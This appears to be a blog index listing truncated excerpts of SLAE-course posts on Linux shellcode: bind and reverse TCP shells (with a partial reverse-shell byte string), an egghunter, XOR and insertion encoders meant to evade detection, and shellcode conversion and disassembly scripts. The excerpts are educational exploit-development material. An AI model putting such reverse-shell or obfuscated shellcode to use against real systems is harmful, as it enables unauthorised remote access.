Linux Shell Bind TCP Shellcode
As part of the SecurityTube SLAE course, I’m going to create a series of shellcodes and document the process. The first task is to create a simple shell bind tcp that spawns a shell on connect, with a...
View ArticleLinux Reverse Shell TCP Shellcode
Now to create a reasonably well optimized linux Reverse TCP shellcode (66 bytes): “\x31\xdb\xf7\xe3\x52\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59\x68” “\x7f\x00\x00\x01” <- IP address...
View ArticleLinux Egghunter Shellcode
I created my first egghunter today, and with a little optimization it’s only 38 bytes in size. It would be possible to make a smaller egghunter that did not check for access to the page such as this...
View ArticleLinux Insertion Obfuscated Shellcode
Here is my next shellcode, along with a generator. This generator inserts a random bit between each legitimate shellcode character, and then the decoder stub unpacks it before running it: ; Title Linux...
View ArticleInsertion and additive XOR encoder shellcode
Another shellcode generator I’ve just created is an additive XOR encoder on top of the previous insertion encoder. Each byte in the shellcode is XOR’d with the previous. Bad character filtering is also...
View ArticleConverting binary to shellcode
Here is my ‘bin2sc.sh’. This is a short bash script that will convert binary to shellcode on the Linux console using objdump: #!/bin/bash code=$(objdump -d $1|grep '[0-9a-f]:'|grep -v 'file'|cut -f2...
View ArticleSLAE Shellcode Dissection
As part of the SecurityTube SLAE course, I’m going to dissect 3 shellcodes from shell-storm.org and then also create variants of 3 shellcodes from shell-storm.org. Here they are:...
View ArticlePython Cascading XOR Polymorphic Shellcode Generator
I’ve been working on a simple python utility to encode and wrap existing shellcode. The shellcode is XOR’d with a random seed byte each time, and then the shellcode is XOR’d with the previous byte. The...
View ArticleBASH One liner – Disassemble shellcode
Here’s a BASH one liner that I just discovered that will allow you to disassemble shellcode on the command line: echo -n $'\x41\x41\x41\x41' | ndisasm -u - 00000000 41 inc ecx 00000001 41 inc ecx...
View Article
